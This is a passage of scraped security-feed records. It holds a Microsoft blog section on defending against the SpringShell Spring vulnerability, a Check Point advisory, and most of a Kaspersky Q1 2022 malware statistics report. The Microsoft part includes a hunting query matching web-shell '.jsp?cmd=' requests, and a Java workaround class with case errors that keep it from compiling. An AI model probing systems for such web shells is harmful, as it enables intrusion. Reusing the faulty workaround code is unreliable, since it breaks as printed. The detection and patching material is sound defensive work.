screenshot below shows all the scenarios which are actively mitigated by Azure Firewall Premium.\n\nConfigure Azure Firewall Premium with both IDPS Alert &amp; Deny mode and TLS inspection enabled for proactive protection against CVE-2022-22965 exploit. \n\nFigure 5. Azure Firewall Premium portal detecting CVE-2022-22965 exploitation attempts.\n\nCustomers using Azure Firewall Standard can migrate to Premium by following [these directions](<https://docs.microsoft.com/azure/firewall/premium-migrate>). Customers new to Azure Firewall Premium can learn more about [Firewall Premium](<https://docs.microsoft.com/azure/firewall/premium-features>).\n\n### Detect and protect with Azure Web Application Firewall (Azure WAF)\n\nAzure Web Application Firewall (WAF) customers with Azure Front Door and Azure Application Gateway deployments now have enhanced protection for the SpringShell exploit - [CVE-2022-22965](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22965>), and other high impact Spring vulnerabilities [CVE-2022-22963](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22963>) and [CVE-2022-22947](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22947>). To help detect and mitigate these critical Spring vulnerabilities, we have released four new rules.\n\n#### Global WAF with Azure Front Door\n\nAzure WAF has updated Default Rule Set (DRS) versions 2.0/1.1/1.0.\n\n * Rule group: _MS-ThreatIntel-WebShells_, Rule Id: 99005006 - Spring4Shell Interaction Attempt\n * Rule group: _MS-ThreatIntel-CVEs_, Rule Id: 99001014 - Attempted Spring Cloud routing-expression injection (CVE-2022-22963)\n * Rule group: _MS-ThreatIntel-CVEs_, Rule Id: 99001015 - Attempted Spring Framework unsafe class object exploitation (CVE-2022-22965)\n * Rule group: _MS-ThreatIntel-CVEs_, Rule Id: 99001016 - Attempted Spring Cloud Gateway Actuator injection (CVE-2022-22947)\n\nWAF rules on Azure Front Door are disabled by default on existing Microsoft managed rule sets.\n\nFigure 6. Screenshot of WAF Spring vulnerabilities\n\n#### Regional WAF with Azure Application Gateway\n\nAzure WAF has updated OWASP Core Rule Set (CRS) versions for Azure Application Gateway WAF V2 regional deployments. New rules are under _Known_CVEs_ rule group:\n\n * Rule Id: 800110 - _Spring4Shell Interaction Attempt_\n * Rule Id: 800111 - _Attempted Spring Cloud routing-expression injection_ - CVE-2022-22963\n * Rule Id: 800112 - _Attempted Spring Framework unsafe class object exploitation_ - CVE-2022-22965\n * Rule Id: 800113 - _Attempted Spring Cloud Gateway Actuator injection_ - CVE-2022-22947\n\nWAF rules on Azure Application Gateway are _enabled_ by default for supported CRS versions.\n\nFigure 7. Spring vulnerability rules for Azure Application Gateway OWASP Core Rule Set (CRS)\n\n**Recommendation**: Enable WAF SpringShell rules to get protection from these threats. We will continue to monitor threat patterns and modify the above rules in response to emerging attack patterns as required. \n\nFor more information about Managed Rules and Default Rule Set (DRS) on Azure Front Door, see the [Web Application Firewall DRS rule groups and rules documentation](<https://docs.microsoft.com/azure/web-application-firewall/afds/waf-front-door-drs>). For more information about Managed Rules and OWASP Core Rule Set (CRS) on Azure Application Gateway, see the [Web Application Firewall CRS rule groups and rules documentation](<https://docs.microsoft.com/en-us/azure/web-application-firewall/ag/application-gateway-crs-rulegroups-rules?tabs=owasp32>)\n\n### Patch information and workarounds\n\nCustomers are encouraged to apply these mitigations to reduce the impact of this threat. Check the recommendations card in Microsoft 365 Defender threat and vulnerability management for the deployment status of monitored mitigations.\n\n * An [update](<https://spring.io/blog/2022/03/31/spring-boot-2-6-6-available-now>) is available for CVE-2022-22965. Administrators should upgrade to versions 5.3.18 or later or 5.2.19 or later. If the patch is applied, no other mitigation is necessary.\n\nIf you\u2019re unable to patch CVE-2022-22965, you can implement this set of workarounds published by [Spring](<https://www.springcloud.io/post/2022-03/spring-framework-rce-early-announcement/#gsc.tab=0>):\n\n * Search the @InitBinder annotation globally in the application to see if the dataBinder.setDisallowedFields method is called in the method body. If the introduction of this code snippet is found, add `{\"class.*\",\"Class.*\",\"*.class.*\", \"*.Class.*\"}` to the original blacklist. (**Note:** If this code snippet is used a lot, it needs to be appended in each location.)\n * Add the following global class into the package where the Controller is located. Then recompile and test the project for functionality:\n \n \n import org.springframework.core.annotation.Order;\n import org.springframework.web.bind.WebDataBinder;\n import org.springframework.web.bind.annotation.ControllerAdvice;\n import org.springframework.web.bind.annotation.InitBinder;\n @ControllerAdvice\n @Order(10000)\n public class GlobalControllerAdvice{\n @InitBinder\n public void setAllowedFields(webdataBinder dataBinder){\n String[]abd=new string[]{\"class.*\",\"Class.*\",\"*.class.*\",\"*.Class.*\"};\n dataBinder.setDisallowedFields(abd);\n }\n }\n\n## Detections\n\n### Microsoft 365 Defender\n\n#### Endpoint detection and response (EDR)\n\nAlerts with the following title in the security center can indicate threat activity on your network:\n\n * Possible SpringShell exploitation\n\nThe following alerts for an observed attack, but might not be unique to exploitation for this vulnerability:\n\n * Suspicious process executed by a network service\n\n#### Antivirus\n\nMicrosoft Defender antivirus version **1.361.1234.0** or later detects components and behaviors related to this threat with the following detections:\n\n * Trojan:Python/SpringShellExpl\n * Exploit:Python/SpringShell\n * Backdoor:PHP/Remoteshell.V\n\n### Hunting\n\n#### Microsoft 365 Defender advanced hunting queries \n\nUse the query below to surface exploitation of CVE-2022-22965 on both victim devices and devices performing the exploitation. Note that this query only covers HTTP use of the exploitation and not HTTPS.\n \n \n DeviceNetworkEvents\n | where Timestamp > ago(7d)\n | where ActionType =~ \"NetworkSignatureInspected\"\n | where AdditionalFields contains \".jsp?cmd=\"\n | summarize makeset(AdditionalFields, 5), min(Timestamp), max(Timestamp) by DeviceId, DeviceName \n\n#### Microsoft Sentinel\n\nMicrosoft Sentinel customers can use the following queries to look for this threat activity:\n\n * [Possible SpringShell exploitation attempt (CVE-2022-22965)](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting Queries/AzureDiagnostics/SpringShellExploitationAttempt.yaml>) \u2013 This hunting query looks in Azure Web Application Firewall data to find possible SpringShell exploitation attempt (CVE-2022-22965) to drop a malicious web shell in a location accessible by HTTP requests. Attackers then make requests to the malicious backdoor to run system commands.\n * [Possible web shell usage attempt related to SpringShell (CVE-2202-22965)](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting Queries/AzureDiagnostics/SpringshellWebshellUsage.yaml>) \u2013 This hunting query looks in Azure Web Application Firewall data to find possible web shell usage related to SpringShell RCE vulnerability (CVE-2022-22965).\n * [AV detections related to SpringShell Vulnerability](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/SecurityAlert/AVSpringShell.yaml>) \u2013 This query looks for Microsoft Defender for Endpoint hits related to the SpringShell vulnerability. In Microsoft Sentinel, the _SecurityAlerts _table includes only the device name of the affected device. This query joins the _DeviceInfo _table to clearly connect other information such as device group, IP address, signed in users, and others. This allows the Microsoft Sentinel analyst to have more context related to the alert, if available.\n\n**Revision history**\n\n_[04/11/2022] \u2013 _Application Gateway now has enhanced protection for critical Spring vulnerabilities - [CVE-2022-22963](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22963>), [CVE-2022-22965](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22965>), and [CVE-2022-22947](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22947>)._ _See _Detection and Mitigation section for details_.\n\n_[04/08/2022] \u2013 Azure Web Application Firewall (WAF) customers with Azure Front Door now has enhanced protection for Spring4Shell exploits - CVE-2022-22963, CVE-2022-22965, and CVE-2022-22947. See Detection and Mitigation section for details. \n[04/05/2022] \u2013 We added Microsoft Sentinel hunting queries to look for SpringShell exploitation activity._\n\nThe post [SpringShell RCE vulnerability: Guidance for protecting against and detecting CVE-2022-22965](<https://www.microsoft.com/security/blog/2022/04/04/springshell-rce-vulnerability-guidance-for-protecting-against-and-detecting-cve-2022-22965/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-05T01:11:24", "type": "mssecure", "title": "SpringShell RCE vulnerability: Guidance for protecting against and detecting CVE-2022-22965", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1622", "CVE-2022-22947", "CVE-2022-22963", "CVE-2022-22965", "CVE-2202-22965"], "modified": "2022-04-05T01:11:24", "id": "MSSECURE:07417E2EE012BAE0350B156AD2AE30B3", "href": "https://www.microsoft.com/security/blog/2022/04/04/springshell-rce-vulnerability-guidance-for-protecting-against-and-detecting-cve-2022-22965/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "checkpoint_security": [{"lastseen": "2022-07-05T21:57:16", "description": "Solution\n\nOn March 29, 2022, new CVEs were published on Spring Cloud: [CVE-2022-22963](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22963>), [CVE-2022-22946](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22946>), [CVE-2022-22947](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22947>), and [CVE-2022-22950](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22950>).\n\nOn March 31, 2022, a bypass to the fix for [CVE-2010-1622](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1622>) was published by Praetorian, and received the nickname \"Spring4Shell\" (see [Spring Core on JDK9+ is vulnerable to remote code execution](<https://www.praetorian.com/blog/spring-core-jdk9-rce>)). Later, it was assigned to [CVE-2022-22965](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22965>).\n\nThe Check Point Infinity architecture is protected against this threat. We verified that this vulnerability does not affect our Infinity portfolio (including Quantum Security Gateways, Smart Management, Quantum Spark appliances with Gaia Embedded OS, Harmony Endpoint, Harmony Mobile, ThreatCloud, and CloudGuard). \nWe will continue to update you on any new development of this security event.\n\n### \nCheck Point Products Status\n\n**Notes:**\n\n * All Check Point software versions, including out of support versions, are not vulnerable.\n * All Check Point appliances are not vulnerable.\n\n### \nIPS protections\n\nCheck Point released these IPS protections:\n\n * Spring Core Remote Code Execution ([CVE-2022-22965](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22965>))\n * Spring Cloud Function Remote Code Execution ([CVE-2022-22963](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22963>))\n * Spring Cloud Gateway Remote Code Execution ([CVE-2022-22947](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22947>))\n\nTo see these IPS protections in SmartConsole:\n\n 1. From the left navigation panel, click **Security Policies**.\n 2. In the upper pane, click **Threat Prevention** &gt; **Custom Policy**.\n 3. In the lower pane, click **IPS Protections**.\n 4. In the top search field, enter the name of the CVE number.\n\n**Best Practice** \\- Check Point recommends activating HTTPS Inspection (in the Security Gateway / Cluster object properties &gt; HTTPS Inspection view), as the attack payload may appear in encrypted or decrypted traffic.\n\n### \nHarmony Endpoint for Linux Protection\n\n * Exploit_Linux_Spring4Shell_B\n\n### \nCloudGuard Containers Security Protection\n\n * Exploit_Linux_Spring4Shell_A\n\n**Related Articles:**\n\n * [sk126352 - Check Point Response to Spring Framework Vulnerabilities: CVE-2018-1270, CVE-2018-1273, CVE-2018-1275](<https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk126352>)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-31T07:41:02", "type": "checkpoint_security", "title": "Check Point Response to Spring Vulnerabilities CVE-2022-22963, CVE-2022-22946, CVE-2022-22947, CVE-2022-22965 (Spring4Shell) and CVE-2022-22950 ", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1622", "CVE-2018-1270", "CVE-2018-1273", "CVE-2018-1275", "CVE-2022-22946", "CVE-2022-22947", "CVE-2022-22950", "CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-03-31T07:41:02", "id": "CPS:SK178605", "href": "https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk178605", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "securelist": [{"lastseen": "2022-05-30T13:56:48", "description": "\n\n * [IT threat evolution in Q1 2022](<https://securelist.com/it-threat-evolution-q1-2022/106513/>)\n * **IT threat evolution in Q1 2022. Non-mobile statistics**\n * [IT threat evolution in Q1 2022. Mobile statistics](<https://securelist.com/it-threat-evolution-in-q1-2022-mobile-statistics/106589/>)\n\n_These statistics are based on detection verdicts of Kaspersky products and services received from users who consented to providing statistical data._\n\n## Quarterly figures\n\nAccording to Kaspersky Security Network, in Q1 2022:\n\n * Kaspersky solutions blocked 1,216,350,437 attacks from online resources across the globe.\n * Web Anti-Virus recognized 313,164,030 unique URLs as malicious.\n * Attempts to run malware for stealing money from online bank accounts were stopped on the computers of 107,848 unique users.\n * Ransomware attacks were defeated on the computers of 74,694 unique users.\n * Our File Anti-Virus detected 58,989,058 unique malicious and potentially unwanted objects.\n\n## Financial threats\n\n### Financial threat statistics\n\nIn Q1 2022 Kaspersky solutions blocked the launch of at least one piece of malware designed to steal money from bank accounts on the computers of 107,848 unique users.\n\n_Number of unique users attacked by financial malware, Q1 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/05/25231205/01-en-malware-report-q1-2022-pc.png>))_\n\n#### Geography of financial malware attacks\n\n_To evaluate and compare the risk of being infected by banking Trojans and ATM/POS malware worldwide, for each country and territory we calculated the share of users of Kaspersky products who faced this threat during the reporting period as a percentage of all users of our products in that country or territory._\n\n_Geography of financial malware attacks, Q1 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/05/25231231/02-en-malware-report-q1-2022-pc.png>))_\n\n**TOP 10 countries by share of attacked users**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Turkmenistan | 4.5 \n2 | Afghanistan | 4.0 \n3 | Tajikistan | 3.9 \n4 | Yemen | 2.8 \n5 | Uzbekistan | 2.4 \n6 | China | 2.2 \n7 | Azerbaijan | 2.0 \n8 | Mauritania | 2.0 \n9 | Sudan | 1.8 \n10 | Syria | 1.8 \n \n_* Excluded are countries with relatively few Kaspersky product users (under 10,000)._ \n_** Unique users whose computers were targeted by financial malware as a percentage of all unique users of Kaspersky products in the country._\n\n#### TOP 10 banking malware families\n\n| **Name** | **Verdicts** | **%*** \n---|---|---|--- \n1 | Ramnit/Nimnul | Trojan-Banker.Win32.Ramnit | 36.5 \n2 | Zbot/Zeus | Trojan-Banker.Win32.Zbot | 16.7 \n3 | CliptoShuffler | Trojan-Banker.Win32.CliptoShuffler | 6.7 \n4 | SpyEye | Trojan-Spy.Win32.SpyEye | 6.3 \n5 | Gozi | Trojan-Banker.Win32.Gozi | 5.2 \n6 | Cridex/Dridex | Trojan-Banker.Win32.Cridex | 3.5 \n7 | Trickster/Trickbot | Trojan-Banker.Win32.Trickster | 3.3 \n8 | RTM | Trojan-Banker.Win32.RTM | 2.7 \n9 | BitStealer | Trojan-Banker.Win32.BitStealer | 2.2 \n10 | Danabot | Trojan-Banker.Win32.Danabot | 1.8 \n \n_* Unique users who encountered this malware family as a percentage of all users attacked by financial malware._\n\nOur TOP 10 leader changed in Q1: the familiar ZeuS/Zbot (16.7%) dropped to second place and Ramnit/Nimnul (36.5%) took the lead. The TOP 3 was rounded out by CliptoShuffler (6.7%).\n\n## Ransomware programs\n\n### Quarterly trends and highlights\n\n#### Law enforcement successes\n\n * Several members of the REvil ransomware crime group were [arrested](<https://tass.com/society/1388613>) by Russian law enforcement in January. The Russian Federal Security Service (FSB) [says](<http://www.fsb.ru/fsb/press/message/single.htm!id=10439388%40fsbMessage.html>) it seized the following assets from the cybercriminals: &quot;more than 426 million rubles ($5.6 million) including denominated in cryptocurrency; $600,000; 500,000 euros; computer equipment, the crypto wallets that were used to perpetrate crimes, and 20 luxury cars that were purchased with illicitly obtained money.&quot;\n * In February, a Canadian citizen was [sentenced](<https://www.bleepingcomputer.com/news/security/netwalker-ransomware-affiliate-sentenced-to-80-months-in-prison/>) to 6 years and 8 months in prison for involvement in NetWalker ransomware attacks (also known as Mailto ransomware).\n * In January, Ukrainian police [arrested](<https://www.bleepingcomputer.com/news/security/ukranian-police-arrests-ransomware-gang-that-hit-over-50-firms/>) a ransomware gang who delivered an unclarified strain of malware via e-mail. According to the statement released by the police, over fifty companies in the United States and Europe were attacked by the cybercriminals.\n\n#### HermeticWiper, HermeticRansom and RUransom, etc.\n\nIn February, new malware was discovered which carried out attacks with the aim of destroying files. Two pieces of malware \u2014 a Trojan called HermeticWiper that destroys data and a cryptor called [HermeticRansom](<https://securelist.com/elections-goransom-and-hermeticwiper-attack/105960/>) \u2014 were both [used](<https://www.kaspersky.com/blog/hermeticransom-hermeticwiper-attacks-2022/43825/>) in cyberattacks in Ukraine. That February, Ukrainian systems were attacked by another Trojan called IsaacWiper, followed by a third Trojan in March called CaddyWiper. The apparent aim of this malware family was to render infected computers unusable leaving no possibility of recovering files.\n\nAn intelligence team later discovered that HermeticRansom only superficially encrypts files, and ones encrypted by the ransomware [can be decrypted](<https://threatpost.com/free-hermeticransom-ransomware-decryptor-released/178762/>).\n\nRUransom malware was discovered in March, which was created to encrypt files on computers in Russia. The analysis of the malicious code revealed it was developed to wipe data, as RUransom generates keys for all the victim&#x27;s encrypted files without storing them anywhere.\n\n#### Conti source-code leak\n\nThe ransomware group Conti had its source code leaked along with its chat logs which were made public. It happened shortly after the Conti group [expressed](<https://www.theverge.com/2022/2/28/22955246/conti-ransomware-russia-ukraine-chat-logs-leaked>) support for the Russian government&#x27;s actions on its website. The true identity of the individual who leaked the data is currently unknown. According to different versions, it could have been a researcher or an insider in the group who disagrees with its position.\n\nWhoever it may have been, the leaked ransomware source codes in the public domain will obviously be at the fingertips of other cybercriminals, which is what happened on more than one occasion with examples like [Hidden Tear](<https://securelist.com/hidden-tear-and-its-spin-offs/73565/>) and Babuk.\n\n#### Attacks on NAS devices\n\nNetwork-attached storage (NAS) devices continue to be targeted by ransomware attacks. A new [wave of Qlocker Trojan infections](<https://www.bleepingcomputer.com/news/security/qlocker-ransomware-returns-to-target-qnap-nas-devices-worldwide/>) on QNAP NAS devices occurred in January following a brief lull which lasted a few months. A new form of ransomware infecting QNAP NAS devices also appeared in the month of January called [DeadBolt](<https://www.bleepingcomputer.com/news/security/qnap-warns-of-new-deadbolt-ransomware-encrypting-nas-devices/>), and [ASUSTOR](<https://www.bleepingcomputer.com/news/security/deadbolt-ransomware-now-targets-asustor-devices-asks-50-btc-for-master-key/>) devices became its new target in February.\n\n#### Maze Decryptor\n\nMaster decryption keys for Maze, Sekhmet and Egregor ransomware were made public in February. The keys turned out to be authentic and we increased our support to decrypt files encrypted by these [infamous](<https://securelist.com/maze-ransomware/99137/>) forms of [ransomware](<https://securelist.com/targeted-ransomware-encrypting-data/99255/>) in our RakhniDecryptor utility. The decryptor is available on the website of our [No Ransom](<https://noransom.kaspersky.com/>) project and the website of the international NoMoreRansom project in the [Decryption Tools](<https://www.nomoreransom.org/en/decryption-tools.html>) section.\n\n### Number of new modifications\n\nIn Q1 2022, we detected eight new ransomware families and 3083 new modifications of this malware type.\n\n_Number of new ransomware modifications, Q1 2021 \u2014 Q1 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/05/25231301/03-en-ru-es-malware-report-q1-2022-pc.png>))_\n\n### Number of users attacked by ransomware Trojans\n\nIn Q1 2022, Kaspersky products and technologies protected 74,694 users from ransomware attacks.\n\n_Number of unique users attacked by ransomware Trojans, Q1 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/05/25231325/04-en-malware-report-q1-2022-pc.png>))_\n\n### Geography of attacked users\n\n_Geography of attacks by ransomware Trojans, Q1 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/05/25231349/05-en-malware-report-q1-2022-pc.png>))_\n\n**TOP 10 countries attacked by ransomware Trojans**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Bangladesh | 2.08 \n2 | Yemen | 1.52 \n3 | Mozambique | 0.82 \n4 | China | 0.49 \n5 | Pakistan | 0.43 \n6 | Angola | 0.40 \n7 | Iraq | 0.40 \n8 | Egypt | 0.40 \n9 | Algeria | 0.36 \n10 | Myanmar | 0.35 \n \n_* Excluded are countries with relatively few Kaspersky users (under 50,000)._ \n_** Unique users whose computers were attacked by Trojan encryptors as a percentage of all unique users of Kaspersky products in the country._\n\n### TOP 10 most common families of ransomware Trojans\n\n| **Name** | **Verdicts*** | **Percentage of attacked users**** \n---|---|---|--- \n1 | Stop/Djvu | Trojan-Ransom.Win32.Stop | 24.38 \n2 | WannaCry | Trojan-Ransom.Win32.Wanna | 13.71 \n3 | (generic verdict) | Trojan-Ransom.Win32.Gen | 9.35 \n4 | (generic verdict) | Trojan-Ransom.Win32.Phny | 7.89 \n5 | (generic verdict) | Trojan-Ransom.Win32.Encoder | 5.66 \n6 | (generic verdict) | Trojan-Ransom.Win32.Crypren | 4.07 \n7 | (generic verdict) | Trojan-Ransom.Win32.CryFile | 3.72 \n8 | PolyRansom/VirLock | Trojan-Ransom.Win32.PolyRansom / Virus.Win32.PolyRansom | 3.37 \n9 | (generic verdict) | Trojan-Ransom.Win32.Crypmod | 3.17 \n10 | (generic verdict) | Trojan-Ransom.Win32.Agent | 1.99 \n \n_* Statistics are based on detection verdicts of Kaspersky products. The information was provided by Kaspersky product users who consented to provide statistical data._ \n_** Unique Kaspersky users attacked by specific ransomware Trojan families as a percentage of all unique users attacked by ransomware Trojans._\n\n## Miners\n\n### Number of new miner modifications\n\nIn Q1 2022, Kaspersky solutions detected 21,282 new modifications of miners.\n\n_Number of new miner modifications, Q1 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/05/25231418/06-en-malware-report-q1-2022-pc.png>))_\n\n### Number of users attacked by miners\n\nIn Q1, we detected attacks using miners on the computers of 508,449 unique users of Kaspersky products and services worldwide.\n\n_Number of unique users attacked by miners, Q1 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/05/25231445/07-en-malware-report-q1-2022-pc.png>))_\n\n### Geography of miner attacks\n\n_Geography of miner attacks, Q1 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/05/25231509/08-en-malware-report-q1-2022-pc.png>))_\n\n**TOP 10 countries attacked by miners**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Ethiopia | 3.01 \n2 | Tajikistan | 2.60 \n3 | Rwanda | 2.45 \n4 | Uzbekistan | 2.15 \n5 | Kazakhstan | 1.99 \n6 | Tanzania | 1.94 \n7 | Ukraine | 1.83 \n8 | Pakistan | 1.79 \n9 | Mozambique | 1.69 \n10 | Venezuela | 1.67 \n \n_* Excluded are countries with relatively few users of Kaspersky products (under 50,000)._ \n_** Unique users attacked by miners as a percentage of all unique users of Kaspersky products in the country._\n\n## Vulnerable applications used by criminals during cyberattacks\n\n### Quarter highlights\n\nIn Q1 2022, a number of serious vulnerabilities were found in Microsoft Windows and its components. More specifically, the vulnerability [CVE-2022-21882](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21882>) was found to be exploited by an unknown group of cybercriminals: a &quot;type confusion&quot; bug in the win32k.sys driver the attacker can use to gain system privileges. Also worth noting is [CVE-2022-21919](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21919>), a vulnerability in the User Profile Service which makes it possible to elevate privileges, along with [CVE-2022-21836](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21836>), which can be used to forge digital certificates.\n\nOne of the major talking points in Q1 was an exploit that targeted the [CVE-2022-0847](<https://dirtypipe.cm4all.com/>) vulnerability in the Linux OS kernel. It was dubbed &quot;Dirty Pipe&quot;. [Researchers discovered](<https://securelist.com/cve-2022-0847-aka-dirty-pipe-vulnerability-in-linux-kernel/106088/>) an &quot;uninitialized memory&quot; vulnerability when analyzing corrupted files, which makes it possible to rewrite a part of the OS memory, namely page memory that contains system files&#x27; data. This in turn opens up an opportunity, such as elevating attacker&#x27;s privileges to root. It&#x27;s worth noting that this vulnerability is fairly easy to exploit, which means users of all systems should regularly install security patches and use all available means to prevent infection.\n\nWhen it comes to network threats, this quarter continued to show how cybercriminals often resort to the technique of brute-forcing passwords to gain unauthorized access to various network services, the most popular of which are MSSQL, RDP and SMB. Attacks using the EternalBlue, EternalRomance and similar exploits remain as popular as ever. Due to widespread unpatched versions of Microsoft Exchange Server, networks often fall victim to exploits of ProxyToken, ProxyShell, ProxyOracle and other vulnerabilities. One example of a critical vulnerability found is remote code execution (RCE) in the Microsoft Windows HTTP protocol stack which allows an attack to be launched remotely by sending a special network packet to a vulnerable system by means of the HTTP trailer functionality. New attacks on network applications which will probably also become common are RCE attacks on the popular Spring Framework and Spring Cloud Gateway. Specific examples of vulnerabilities in these applications are [CVE-2022-22965](<https://nvd.nist.gov/vuln/detail/CVE-2022-22965>) (Spring4Shell) and [CVE-2022-22947](<https://nvd.nist.gov/vuln/detail/CVE-2022-22947>).\n\n### Vulnerability statistics\n\nQ1 2022 saw an array of changes in the statistics on common vulnerability types. For instance, the top place in the statistics is still firmly held by exploits targeting vulnerabilities in Microsoft Office and their share has increased significantly to 78.5%. The same common vulnerabilities we&#x27;ve written about on more than one occasion are still the most widely exploited within this category of threats. These are [CVE-2017-11882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>) and [CVE-2018-0802](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0802>), which cause a buffer overflow when processing objects in a specially crafted document in the Equation Editor component and ultimately allow an attacker to execute arbitrary code. There&#x27;s also [CVE-2017-8570](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8570>), where opening a specially crafted file with an affected version of Microsoft Office software gives attackers the opportunity to perform various actions on the vulnerable system. Another vulnerability found last year which is very popular with cybercriminals is [CVE-2021-40444](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-40444>), which they can use to exploit through a specially prepared Microsoft Office document with an embedded malicious ActiveX control for executing arbitrary code in the system.\n\n_Distribution of exploits used by cybercriminals, by type of attacked application, Q1 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/05/25231538/09-en-malware-report-q1-2022-pc.png>))_\n\nExploits targeting browsers came second again in Q1, although their share dropped markedly to just 7.64%. Browser developers put a great deal of effort into patching vulnerability exploits in each new version and closing a large number of gaps in system security. Apart from that, the majority of browsers have automatic updates as opposed to the distinct example of Microsoft Office, where many of its users still use outdated versions and are in no rush to install security updates. That could be precisely the reason why we&#x27;ve seen a reduction in the share of browser exploits in our statistics. However, this does not mean they&#x27;re no longer an immediate threat. For instance, Chrome&#x27;s developers fixed a number of critical RCE vulnerabilities, including:\n\n * [CVE-2022-1096](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-1096>): a &quot;type confusion&quot; vulnerability in the V8 script engine which gives attackers the opportunity to remotely execute code (RCE) in the context of the browser&#x27;s security sandbox.\n * [CVE-2022-0609](<https://nvd.nist.gov/vuln/detail/CVE-2022-0609>): a use-after-free vulnerability which allows to corrupt the process memory and remotely execute arbitrary codes when performing specially generated scripts that use animation.\n\nSimilar vulnerabilities were found in the browser&#x27;s other components: [CVE-2022-0605](<https://nvd.nist.gov/vuln/detail/CVE-2022-0605>)which uses Web Store API, and [CVE-2022-0606](<https://nvd.nist.gov/vuln/detail/CVE-2022-0606>) which is associated with vulnerabilities in the WebGL backend (ANGLE). Another vulnerability found was [CVE-2022-0604](<https://nvd.nist.gov/vuln/detail/CVE-2022-0604>), which can be used to exploit a heap buffer overflow in Tab Groups, also potentially leading to remote code execution (RCE).\n\nExploits for Android came third in our statistics (4.10%), followed by exploits targeting the Adobe Flash Platform (3.49%), PDF files (3.48%) and Java apps (2.79%).\n\n## Attacks on macOS\n\nThe year began with a number of interesting multi-platform finds: the 